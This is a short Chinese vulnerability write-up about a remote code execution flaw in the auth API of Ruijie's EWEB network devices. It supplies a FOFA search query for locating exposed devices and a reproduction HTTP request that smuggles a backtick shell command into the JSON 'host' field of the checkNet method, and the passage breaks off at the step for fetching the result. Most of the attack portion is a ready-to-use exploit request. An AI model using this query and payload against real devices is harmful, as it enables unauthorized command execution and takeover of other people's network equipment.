0x01 产品简介
锐捷睿易是锐捷网络针对商业市场的子品牌。拥有易网络、交换机、路由器、无线、安全、云服务六大产品线,解决方案涵盖商贸零售、酒店、KTV、网吧、监控安防、物流仓储、制造业、中小教育、中小医疗、中小政府等商业用户。
0x02 漏洞概述
锐捷 EWEB auth接口存在远程代码执行漏洞,未授权的攻击者可以通过该漏洞执行恶意命令,进而导致服务器失陷。
0x03 测绘语句
fofa: body="cgi-bin/luci" && body="#f47f3e"
0x04 漏洞复现
1、上传文件POST /cgi-bin/luci/api/auth HTTP/1.1
Host:
Content-Type: application/json
{"method":"checkNet","params":{"host":"`echo Hello World!>test.txt`"}}
2、访问文件: